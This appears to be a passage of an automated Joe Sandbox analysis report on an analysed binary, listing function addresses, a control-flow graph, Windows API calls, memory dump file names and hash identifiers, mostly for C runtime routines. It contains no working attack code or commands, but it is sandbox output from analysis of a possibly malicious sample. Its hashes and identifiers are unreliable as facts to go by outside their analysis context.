                                                                                                                                                                                                                        control_flow_graph 819 7ff72935c270-7ff72935c295 820 7ff72935c29b-7ff72935c29e 819->820 821 7ff72935c563 819->821 823 7ff72935c2d7-7ff72935c303 820->823 824 7ff72935c2a0-7ff72935c2d2 call 7ff729359b24 820->824 822 7ff72935c565-7ff72935c575 821->822 826 7ff72935c30e-7ff72935c314 823->826 827 7ff72935c305-7ff72935c30c 823->827 824->822 829 7ff72935c324-7ff72935c339 call 7ff729362c2c 826->829 830 7ff72935c316-7ff72935c31f call 7ff72935b630 826->830 827->824 827->826 834 7ff72935c453-7ff72935c45c 829->834 835 7ff72935c33f-7ff72935c348 829->835 830->829 837 7ff72935c45e-7ff72935c464 834->837 838 7ff72935c4b0-7ff72935c4d5 WriteFile 834->838 835->834 836 7ff72935c34e-7ff72935c352 835->836 841 7ff72935c354-7ff72935c35c call 7ff729353ae0 836->841 842 7ff72935c363-7ff72935c36e 836->842 839 7ff72935c49c-7ff72935c4ae call 7ff72935bd28 837->839 840 7ff72935c466-7ff72935c469 837->840 843 7ff72935c4d7-7ff72935c4dd GetLastError 838->843 844 7ff72935c4e0 838->844 867 7ff72935c440-7ff72935c447 839->867 845 7ff72935c46b-7ff72935c46e 840->845 846 7ff72935c488-7ff72935c49a call 7ff72935bf48 840->846 841->842 848 7ff72935c370-7ff72935c379 842->848 849 7ff72935c37f-7ff72935c394 GetConsoleMode 842->849 843->844 851 7ff72935c4e3 844->851 852 7ff72935c4f4-7ff72935c4fe 845->852 853 7ff72935c474-7ff72935c486 call 7ff72935be2c 845->853 846->867 848->834 848->849 856 7ff72935c44c 849->856 857 7ff72935c39a-7ff72935c3a0 849->857 859 7ff72935c4e8 851->859 861 7ff72935c55c-7ff72935c561 852->861 862 7ff72935c500-7ff72935c505 852->862 853->867 856->834 865 7ff72935c429-7ff72935c43b call 7ff72935b8b0 857->865 866 7ff72935c3a6-7ff72935c3a9 857->866 860 7ff72935c4ed 859->860 860->852 861->822 868 7ff72935c507-7ff72935c50a 862->868 869 7ff72935c533-7ff72935c53d 862->869 865->867 872 7ff72935c3ab-7ff72935c3ae 866->872 873 7ff72935c3b4-7ff72935c3c2 866->873 867->859 874 7ff72935c50c-7ff72935c51b 868->874 875 7ff72935c523-7ff72935c52e call 7ff7293543b0 868->875 876 7ff72935c544-7ff72935c553 869->876 877 7ff72935c53f-7ff72935c542 869->877 872->860 872->873 878 7ff72935c3c4 873->878 879 7ff72935c420-7ff72935c424 873->879 874->875 875->869 876->861 877->821 877->876 881 7ff72935c3c8-7ff72935c3df call 7ff729362cf8 878->881 879->851 885 7ff72935c417-7ff72935c41d GetLastError 881->885 886 7ff72935c3e1-7ff72935c3ed 881->886 885->879 887 7ff72935c40c-7ff72935c413 886->887 888 7ff72935c3ef-7ff72935c401 call 7ff729362cf8 886->888 887->879 890 7ff72935c415 887->890 888->885 892 7ff72935c403-7ff72935c40a 888->892 890->881 892->887
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72935C25B), ref: 00007FF72935C38C
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72935C25B), ref: 00007FF72935C417
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                        • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                        • Instruction ID: d696f585059061028a0883192bc655101a256a4cb1aa9fb8d20d67f10d25ad80
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8391C862E0865165F751AF6598C06BDAFB0FB0CB8CF98413DDE0E56A86DE3CD841DB20
                                                                                                                                                                                                                        Function 00007FF729354938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                        • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                        • Instruction ID: be34d7c04a9aab22bf853de25ec8659ca04069d058bad59f338a14b6e22dd45c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D041C522D1878153F358AF619984379B670FB9C764F549338D65C13AD6DF7CA0E09B20
                                                                                                                                                                                                                        Function 00007FF72934BF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                        • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                        • Instruction ID: 900347d8a72d112e3410356faf72a27ca43c6e6210effa74de3ad31ac7a1b3c7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08310711A0C24241FA55BF649CD23FA92B1EF45384FCE603CE90E476D3DE6DA804AE75
                                                                                                                                                                                                                        Function 00007FF729358D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                        • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                        • Instruction ID: 29ac90e19319a2f83b956192e8d234bb600857d9c921bdf596a9695bc0598489
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AD06710B1860A97EA543F715CD91B997B19F5C701B99143CD84A46393CD2CA8096E64
                                                                                                                                                                                                                        Function 00007FF72934F45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                        • Instruction ID: c6e02600ad0b48cd9ecdb11a8e9c48b8fce71e19cd3e096fb75d6c021016f7c0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA51C961B0924246F628BD269C8067AA6E1EF44BB4F9D573CDD6D877D7CE3CD400AE20
                                                                                                                                                                                                                        Function 00007FF72935B444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                        • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                        • Instruction ID: 8c37a28151faca12675f895c2d61649b76157cf6ebd99c7295ff386ec2627623
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E11B6A1618A8191DA20AF25A8841A9A771FB48BF4F98033DEE7D077E6CE3CD4519B00
                                                                                                                                                                                                                        Function 00007FF729359C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C6E
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C78
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                        • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                        • Instruction ID: 4a20c70ed96bda16d3438f8c1caf9c95fcdb624dd338c68b5f1e8cbcd8da4b8d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90E04F10F0C64252FB087FB2ACC407996B1DF9C700BC8403CC90D42263DE2C64556E30
                                                                                                                                                                                                                        Function 00007FF729359E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF729359CE5,?,?,00000000,00007FF729359D9A), ref: 00007FF729359ED6
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF729359CE5,?,?,00000000,00007FF729359D9A), ref: 00007FF729359EE0
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                        • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                        • Instruction ID: b8b1ec5e789aee38a899fd223cf23f19faa55d8a4151d2d5b6558bd55907ee9a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1218311B1C64251FE647B61ACC42799AB2DF8C7A0FDC423DD92E477D3DE6CA440AB21
                                                                                                                                                                                                                        Function 00007FF72935B1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                        • Instruction ID: c06b4f5eb03323728e8ad319b8ec4d4765fe35711d346365fe1e139f3da35b54
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF41D67290820597EA64AF15E9811BDBBB0EB5D780F98013DD68E87692CF3CE502DB71
                                                                                                                                                                                                                        Function 00007FF7293476A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                        • Opcode ID: 2801ef901b5e4116eaa1f740e61a66d23bcfa48883d9a9639a108be29981ab51
                                                                                                                                                                                                                        • Instruction ID: b810fba91bd1003f04f5cef5b963fc6d4ea8f01e3910d75e9d03e0bfb16dea02
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2801ef901b5e4116eaa1f740e61a66d23bcfa48883d9a9639a108be29981ab51
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA219121B0865145FA14AE16AD843BAEAB1FF49BD4FCD6438DD0E47783CE3DE051DA20
                                                                                                                                                                                                                        Function 00007FF72935AC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                        • Instruction ID: 72a02e4dad3fc9d276735159a8f6c4247cdef685b8be5e5fc3c2553e42758259
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E319E21A08642A2E7157F148CC127CAEB0EB5CBA0FC90139D91D973E3CE7CA455BB30
                                                                                                                                                                                                                        Function 00007FF729358C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                        • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                        • Instruction ID: 3489ee5e0a615646520594ca1b287668a195354031671f03e6b5ffd98339dbdf
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1921A136A157059AEB25AF64C8802FC7BB0FB0C318F88063ED61C06AD6DF38D444DB60
                                                                                                                                                                                                                        Function 00007FF7293552A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                        • Instruction ID: 2b0d4be6aee9443156405abbd578a9e00e387924405ddc560a8f0ea3820f482a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
